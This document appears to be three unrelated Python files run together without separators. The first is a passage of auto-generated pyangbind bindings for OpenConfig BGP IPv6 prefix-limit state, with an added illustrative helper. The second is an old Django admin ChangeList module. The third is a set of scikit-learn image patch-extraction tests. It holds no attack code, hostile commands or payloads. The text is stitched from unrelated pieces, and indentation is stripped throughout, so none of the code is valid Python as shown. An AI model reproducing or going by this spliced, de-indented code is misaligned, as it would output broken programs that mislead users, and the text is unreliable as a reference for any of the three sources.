default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """prevent_teardown must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="prevent-teardown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__prevent_teardown = t
if hasattr(self, "_set"):
self._set()
def _unset_prevent_teardown(self):
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
def _get_shutdown_threshold_pct(self):
"""
Getter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
return self.__shutdown_threshold_pct
def _set_shutdown_threshold_pct(self, v, load=False):
"""
Setter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown_threshold_pct is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown_threshold_pct() directly.
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shutdown_threshold_pct must be of a type compatible with oc-types:percentage""",
"defined-type": "oc-types:percentage",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..100']}), is_leaf=True, yang_name="shutdown-threshold-pct", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-types:percentage', is_config=False)""",
}
)
self.__shutdown_threshold_pct = t
if hasattr(self, "_set"):
self._set()
def _unset_shutdown_threshold_pct(self):
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
def _get_restart_timer(self):
"""
Getter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
return self.__restart_timer
def _set_restart_timer(self, v, load=False):
"""
Setter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_timer() directly.
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_timer must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="restart-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=False)""",
}
)
self.__restart_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_timer(self):
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
max_prefixes = __builtin__.property(_get_max_prefixes)
prevent_teardown = __builtin__.property(_get_prevent_teardown)
shutdown_threshold_pct = __builtin__.property(_get_shutdown_threshold_pct)
restart_timer = __builtin__.property(_get_restart_timer)
_pyangbind_elements = OrderedDict(
[
("max_prefixes", max_prefixes),
("prevent_teardown", prevent_teardown),
("shutdown_threshold_pct", shutdown_threshold_pct),
("restart_timer", restart_timer),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/bgp/global/afi-safis/afi-safi/ipv6-unicast/prefix-limit/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State information relating to the prefix-limit for the
AFI-SAFI
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__max_prefixes",
"__prevent_teardown",
"__shutdown_threshold_pct",
"__restart_timer",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"global",
"afi-safis",
"afi-safi",
"ipv6-unicast",
"prefix-limit",
"state",
]
def _get_max_prefixes(self):
"""
Getter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
return self.__max_prefixes
def _set_max_prefixes(self, v, load=False):
"""
Setter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_prefixes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_prefixes() directly.
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """max_prefixes must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__max_prefixes = t
if hasattr(self, "_set"):
self._set()
def _unset_max_prefixes(self):
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_prevent_teardown(self):
"""
Getter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
return self.__prevent_teardown
def _set_prevent_teardown(self, v, load=False):
"""
Setter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_prevent_teardown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prevent_teardown() directly.
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """prevent_teardown must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="prevent-teardown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__prevent_teardown = t
if hasattr(self, "_set"):
self._set()
def _unset_prevent_teardown(self):
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
def _get_shutdown_threshold_pct(self):
"""
Getter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
return self.__shutdown_threshold_pct
def _set_shutdown_threshold_pct(self, v, load=False):
"""
Setter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown_threshold_pct is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown_threshold_pct() directly.
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shutdown_threshold_pct must be of a type compatible with oc-types:percentage""",
"defined-type": "oc-types:percentage",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..100']}), is_leaf=True, yang_name="shutdown-threshold-pct", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-types:percentage', is_config=False)""",
}
)
self.__shutdown_threshold_pct = t
if hasattr(self, "_set"):
self._set()
def _unset_shutdown_threshold_pct(self):
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
def _get_restart_timer(self):
"""
Getter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
return self.__restart_timer
def _set_restart_timer(self, v, load=False):
"""
Setter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_timer() directly.
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_timer must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="restart-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=False)""",
}
)
self.__restart_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_timer(self):
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
max_prefixes = __builtin__.property(_get_max_prefixes)
prevent_teardown = __builtin__.property(_get_prevent_teardown)
shutdown_threshold_pct = __builtin__.property(_get_shutdown_threshold_pct)
restart_timer = __builtin__.property(_get_restart_timer)
_pyangbind_elements = OrderedDict(
[
("max_prefixes", max_prefixes),
("prevent_teardown", prevent_teardown),
("shutdown_threshold_pct", shutdown_threshold_pct),
("restart_timer", restart_timer),
]
)
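# Illustrative sketch (not part of the generated bindings): the read-only
# leaves on the `state` containers above are exposed as properties backed by
# the _get_* methods; the prevent-teardown leaf defaults to false per the
# YANG model, so it should evaluate falsy until a backend populates it.
def _example_prefix_limit_state():
    s = state()
    leaves = list(s._pyangbind_elements)            # leaf names in YANG order
    teardown_suppressed = bool(s.prevent_teardown)  # False while unset (default "false")
    return leaves, teardown_suppressed, s._path()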
|
|
from django.contrib.admin.filterspecs import FilterSpec
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import quote
from django.core.paginator import Paginator, InvalidPage
from django.db import models
from django.db.models.query import QuerySet
from django.utils.encoding import force_unicode, smart_str
from django.utils.translation import ugettext
from django.utils.http import urlencode
import operator
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
# The system will display a "Show all" link on the change list only if the
# total result count is less than or equal to this setting.
MAX_SHOW_ALL_ALLOWED = 200
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
IS_POPUP_VAR = 'pop'
ERROR_FLAG = 'e'
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = '(None)'
class ChangeList(object):
def __init__(self, request, model, list_display, list_display_links, list_filter, date_hierarchy, search_fields, list_select_related, list_per_page, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_query_set = model_admin.queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_editable = list_editable
self.model_admin = model_admin
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = IS_POPUP_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if TO_FIELD_VAR in self.params:
del self.params[TO_FIELD_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
self.order_field, self.order_type = self.get_ordering()
self.query = request.GET.get(SEARCH_VAR, '')
self.query_set = self.get_query_set()
self.get_results(request)
self.title = (self.is_popup and ugettext('Select %s') % force_unicode(self.opts.verbose_name) or ugettext('Select %s to change') % force_unicode(self.opts.verbose_name))
self.filter_specs, self.has_filters = self.get_filters(request)
self.pk_attname = self.lookup_opts.pk.attname
def get_filters(self, request):
filter_specs = []
if self.list_filter:
filter_fields = [self.lookup_opts.get_field(field_name) for field_name in self.list_filter]
for f in filter_fields:
spec = FilterSpec.create(f, request, self.params, self.model, self.model_admin)
if spec and spec.has_output():
filter_specs.append(spec)
return filter_specs, bool(filter_specs)
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(p)
def get_results(self, request):
paginator = Paginator(self.query_set, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization: Check to see whether any filters were
# given. If not, use paginator.count to calculate the number of objects,
# because we've already computed paginator.count and the value is cached.
if not self.query_set.query.where:
full_result_count = result_count
else:
full_result_count = self.root_query_set.count()
can_show_all = result_count <= MAX_SHOW_ALL_ALLOWED
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.query_set._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
result_list = ()
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def get_ordering(self):
lookup_opts, params = self.lookup_opts, self.params
# For ordering, first check the "ordering" parameter in the admin
# options, then check the object's default ordering. If neither of
# those exist, order descending by ID by default. Finally, look for
# manually-specified ordering from the query string.
ordering = self.model_admin.ordering or lookup_opts.ordering or ['-' + lookup_opts.pk.name]
if ordering[0].startswith('-'):
order_field, order_type = ordering[0][1:], 'desc'
else:
order_field, order_type = ordering[0], 'asc'
if ORDER_VAR in params:
try:
field_name = self.list_display[int(params[ORDER_VAR])]
try:
f = lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
try:
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
order_field = attr.admin_order_field
except AttributeError:
pass
else:
order_field = f.name
except (IndexError, ValueError):
pass # Invalid ordering specified. Just use the default.
if ORDER_TYPE_VAR in params and params[ORDER_TYPE_VAR] in ('asc', 'desc'):
order_type = params[ORDER_TYPE_VAR]
return order_field, order_type
def get_query_set(self):
qs = self.root_query_set
lookup_params = self.params.copy() # a dictionary of the query string
for i in (ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR):
if i in lookup_params:
del lookup_params[i]
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[smart_str(key)] = value
# if key ends with __in, split parameter into separate values
if key.endswith('__in'):
lookup_params[key] = value.split(',')
# Apply lookup parameters from the query string.
try:
qs = qs.filter(**lookup_params)
# Naked except! Because we don't have any other way of validating "params".
# They might be invalid if the keyword arguments are incorrect, or if the
# values are not in the correct type, so we might get FieldError, ValueError,
# ValidationError, or ? from a custom field that raises yet something else
# when handed impossible data.
except:
raise IncorrectLookupParameters
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not qs.query.select_related:
if self.list_select_related:
qs = qs.select_related()
else:
for field_name in self.list_display:
try:
f = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(f.rel, models.ManyToOneRel):
qs = qs.select_related()
break
# Set ordering.
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
if self.search_fields and self.query:
for bit in self.query.split():
or_queries = [models.Q(**{construct_search(str(field_name)): bit}) for field_name in self.search_fields]
qs = qs.filter(reduce(operator.or_, or_queries))
for field_name in self.search_fields:
if '__' in field_name:
qs = qs.distinct()
break
return qs
def url_for_result(self, result):
return "%s/" % quote(getattr(result, self.pk_attname))
|
|
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
# Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.float)
assert_true(A.dtype == np.float)
def test_connect_regions():
lena = sp.misc.lena()
for thr in (50, 150):
mask = lena > thr
graph = img_to_graph(lena, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
lena = sp.misc.lena()
mask = lena > 50
graph = grid_to_graph(*lena.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = lena > 150
graph = grid_to_graph(*lena.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_lena():
lena = sp.misc.lena().astype(np.float32)
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = lena.astype(np.float)
lena /= 16.0
return lena
def _orange_lena(lena=None):
lena = _downsampled_lena() if lena is None else lena
lena_color = np.zeros(lena.shape + (3,))
lena_color[:, :, 0] = 256 - lena
lena_color[:, :, 1] = 256 - lena / 2
lena_color[:, :, 2] = 256 - lena / 4
return lena_color
def _make_images(lena=None):
lena = _downsampled_lena() if lena is None else lena
# make a collection of lenas
images = np.zeros((3,) + lena.shape)
images[0] = lena
images[1] = lena + 1
images[2] = lena + 2
return images
downsampled_lena = _downsampled_lena()
orange_lena = _orange_lena(downsampled_lena)
lena_collection = _make_images(downsampled_lena)
def test_extract_patches_all():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
lena = orange_lena
i_h, i_w = lena.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
lena = downsampled_lena
lena = lena[:, 32:97]
i_h, i_w = lena.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=2.0)
